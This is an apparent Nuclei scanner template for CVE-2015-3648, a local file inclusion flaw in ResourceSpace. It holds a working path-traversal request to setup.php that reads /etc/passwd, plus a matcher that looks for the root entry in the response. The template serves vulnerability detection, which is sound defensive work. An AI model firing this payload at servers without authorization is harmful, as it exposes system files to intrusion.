30 lines
720 B
YAML
30 lines
720 B
YAML
id: CVE-2015-3648
|
|
|
|
info:
|
|
name: ResourceSpace - Local File inclusion
|
|
author: pikpikcu
|
|
severity: high
|
|
description: ResourceSpace is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input.
|
|
reference:
|
|
- https://vulners.com/cve/CVE-2015-3648/
|
|
- https://www.securityfocus.com/bid/75019
|
|
classification:
|
|
cve-id: CVE-2015-3648
|
|
tags: cve,cve2015,lfi,resourcespace
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/pages/setup.php?defaultlanguage=..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|